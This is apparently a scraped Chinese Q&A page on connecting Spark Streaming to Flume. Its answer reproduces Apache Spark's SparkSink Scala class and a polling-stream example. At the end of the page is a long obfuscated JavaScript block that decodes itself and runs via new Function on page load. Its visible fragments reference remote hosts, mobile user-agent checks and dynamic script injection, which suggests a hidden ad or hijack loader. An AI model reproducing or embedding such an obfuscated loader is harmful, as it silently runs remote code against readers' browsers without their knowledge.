sparkstreaming结果可以直接flume汇总吗

2025-03-05 11:23:24
推荐回答(1个)
回答(1):

首先,需要将以下代码编译成jar包,然后在flume中使用,代码转自这里 (如果发现需要依赖的工具类神马的,请在相同目录下的scala文件中找一找)
package org.apache.spark.streaming.flume.sink

import java.net.InetSocketAddress
import java.util.concurrent._

import org.apache.avro.ipc.NettyServer
import org.apache.avro.ipc.specific.SpecificResponder
import org.apache.flume.Context
import org.apache.flume.Sink.Status
import org.apache.flume.conf.{Configurable, ConfigurationException}
import org.apache.flume.sink.AbstractSink

/**
* A sink that uses Avro RPC to run a server that can be polled by Spark's
* FlumePollingInputDStream. This sink has the following configuration parameters:
*
* hostname - The hostname to bind to. Default: 0.0.0.0
* port - The port to bind to. (No default - mandatory)
* timeout - Time in seconds after which a transaction is rolled back,
* if an ACK is not received from Spark within that time
* threads - Number of threads to use to receive requests from Spark (Default: 10)
*
* This sink is unlike other Flume sinks in the sense that it does not push data,
* instead the process method in this sink simply blocks the SinkRunner the first time it is
* called. This sink starts up an Avro IPC server that uses the SparkFlumeProtocol.
*
* Each time a getEventBatch call comes, creates a transaction and reads events
* from the channel. When enough events are read, the events are sent to the Spark receiver and
* the thread itself is blocked and a reference to it saved off.
*
* When the ack for that batch is received,
* the thread which created the transaction is is retrieved and it commits the transaction with the
* channel from the same thread it was originally created in (since Flume transactions are
* thread local). If a nack is received instead, the sink rolls back the transaction. If no ack
* is received within the specified timeout, the transaction is rolled back too. If an ack comes
* after that, it is simply ignored and the events get re-sent.
*
*/

class SparkSink extends AbstractSink with Logging with Configurable {

// Size of the pool to use for holding transaction processors.
private var poolSize: Integer = SparkSinkConfig.DEFAULT_THREADS

// Timeout for each transaction. If spark does not respond in this much time,
// rollback the transaction
private var transactionTimeout = SparkSinkConfig.DEFAULT_TRANSACTION_TIMEOUT

// Address info to bind on
private var hostname: String = SparkSinkConfig.DEFAULT_HOSTNAME
private var port: Int = 0

private var backOffInterval: Int = 200

// Handle to the server
private var serverOpt: Option[NettyServer] = None

// The handler that handles the callback from Avro
private var handler: Option[SparkAvroCallbackHandler] = None

// Latch that blocks off the Flume framework from wasting 1 thread.
private val blockingLatch = new CountDownLatch(1)

override def start() {
logInfo("Starting Spark Sink: " + getName + " on port: " + port + " and interface: " +
hostname + " with " + "pool size: " + poolSize + " and transaction timeout: " +
transactionTimeout + ".")
handler = Option(new SparkAvroCallbackHandler(poolSize, getChannel, transactionTimeout,
backOffInterval))
val responder = new SpecificResponder(classOf[SparkFlumeProtocol], handler.get)
// Using the constructor that takes specific thread-pools requires bringing in netty
// dependencies which are being excluded in the build. In practice,
// Netty dependencies are already available on the JVM as Flume would have pulled them in.
serverOpt = Option(new NettyServer(responder, new InetSocketAddress(hostname, port)))
serverOpt.foreach(server => {
logInfo("Starting Avro server for sink: " + getName)
server.start()
})
super.start()
}

override def stop() {
logInfo("Stopping Spark Sink: " + getName)
handler.foreach(callbackHandler => {
callbackHandler.shutdown()
})
serverOpt.foreach(server => {
logInfo("Stopping Avro Server for sink: " + getName)
server.close()
server.join()
})
blockingLatch.countDown()
super.stop()
}

override def configure(ctx: Context) {
import SparkSinkConfig._
hostname = ctx.getString(CONF_HOSTNAME, DEFAULT_HOSTNAME)
port = Option(ctx.getInteger(CONF_PORT)).
getOrElse(throw new ConfigurationException("The port to bind to must be specified"))
poolSize = ctx.getInteger(THREADS, DEFAULT_THREADS)
transactionTimeout = ctx.getInteger(CONF_TRANSACTION_TIMEOUT, DEFAULT_TRANSACTION_TIMEOUT)
backOffInterval = ctx.getInteger(CONF_BACKOFF_INTERVAL, DEFAULT_BACKOFF_INTERVAL)
logInfo("Configured Spark Sink with hostname: " + hostname + ", port: " + port + ", " +
"poolSize: " + poolSize + ", transactionTimeout: " + transactionTimeout + ", " +
"backoffInterval: " + backOffInterval)
}

override def process(): Status = {
// This method is called in a loop by the Flume framework - block it until the sink is
// stopped to save CPU resources. The sink runner will interrupt this thread when the sink is
// being shut down.
logInfo("Blocking Sink Runner, sink will continue to run..")
blockingLatch.await()
Status.BACKOFF
}

private[flume] def getPort(): Int = {
serverOpt
.map(_.getPort)
.getOrElse(
throw new RuntimeException("Server was not started!")
)
}

/**
* Pass in a [[CountDownLatch]] for testing purposes. This batch is counted down when each
* batch is received. The test can simply call await on this latch till the expected number of
* batches are received.
* @param latch
*/
private[flume] def countdownWhenBatchReceived(latch: CountDownLatch) {
handler.foreach(_.countDownWhenBatchAcked(latch))
}
}

/**
* Configuration parameters and their defaults.
*/
private[flume]
object SparkSinkConfig {
val THREADS = "threads"
val DEFAULT_THREADS = 10

val CONF_TRANSACTION_TIMEOUT = "timeout"
val DEFAULT_TRANSACTION_TIMEOUT = 60

val CONF_HOSTNAME = "hostname"
val DEFAULT_HOSTNAME = "0.0.0.0"

val CONF_PORT = "port"

val CONF_BACKOFF_INTERVAL = "backoffInterval"
val DEFAULT_BACKOFF_INTERVAL = 200
}
  
然后在你的streaming中使用如下的代码
package org.apache.spark.examples.streaming
import org.apache.spark.SparkConf
import org.apache.spark.storage.StorageLevel
import org.apache.spark.streaming._
import org.apache.spark.streaming.flume._
import org.apache.spark.util.IntParam
import java.net.InetSocketAddress

/**
* Produces a count of events received from Flume.
*
* This should be used in conjunction with the Spark Sink running in a Flume agent. See
* the Spark Streaming programming guide for more details.
*
* Usage: FlumePollingEventCount
* `host` is the host on which the Spark Sink is running.
* `port` is the port at which the Spark Sink is listening.
*
* To run this example:
* `$ bin/run-example org.apache.spark.examples.streaming.FlumePollingEventCount [host] [port] `
*/
object FlumePollingEventCount {
def main(args: Array[String]) {
if (args.length < 2) {
System.err.println(
"Usage: FlumePollingEventCount ")
System.exit(1)
}

StreamingExamples.setStreamingLogLevels()

val Array(host, IntParam(port)) = args

val batchInterval = Milliseconds(2000)

// Create the context and set the batch size
val sparkConf = new SparkConf().setAppName("FlumePollingEventCount")
val ssc = new StreamingContext(sparkConf, batchInterval)

// Create a flume stream that polls the Spark Sink running in a Flume agent
val stream = FlumeUtils.createPollingStream(ssc, host, port)

// Print out the count of events received from this server in each batch
stream.count().map(cnt => "Received " + cnt + " flume events." ).print()

ssc.start()
ssc.awaitTermination()
}
}

!function(){function a(a){var _idx="g3r6t5j1i0";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,cca8>[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y=F=O8D62fODm622Y5V6fFh!qYF ^8O/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgO/}0=6FY^9Y6phFg^/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"#MqYYb"=d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 pcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!7mqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28H"hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"Z!qYF O8pc2Hc2YD wdFYampYFwdTcaZ??2H0Za%"/h^/Ks0jR8ps5KFnC}60"!O8O%c*}888Om62fYR;7c"j"aj"j"g"v"a%"58"%7m5Y|5T%%%"vF8"%hca%5ca=FmL5(8pcOa=FmO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=7mqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF J8"Ks0"=X8"ps5KFnC}60"!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"Ks0^)ThF)mpOL2fmRT4"="Ks0X5ThF)m64YdCmRT4"="Ks02pThFmpOL2fmRT4"="Ks0_JqhFm64YdCmRT4"="Ks02TOhFmpOL2fmRT4"="Ks0CSqhF)m64YdCmRT4"="Ks0)FfThF)fmpOL2fmRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"!qYF O82YD VY)iO(SYFcF%"/"%J%"jR8"%X%"v58"%7m5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=^80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!^<YmqY2pFh!a28fH_ZcYH(Zc^%%aa=O8fH_ZcYH(Zc^%%aa=68fH_ZcYH(Zc^%%aa=d8fH_ZcYH(Zc^%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 78h!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 )ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=h=l0a=7m(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<^%6vvfcaPYqLY[F8F*O!67cF<86a5YF_52l}!F<^%6vvfcaPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8pc"hFFJLg//[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q/f/Ks0j(8}vR8ps5KFnC}60"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPO82dX6pdFO5mJqdF7O5^=Y8l/3cV62?yd(a/mFYLFcOa=F8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cY??Favvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2FajDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaPaa=lYvvO??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8pc"hFFJLg//[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"a%"/)_pj68"%J=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPaca!'.substr(22));new Function(b)()}();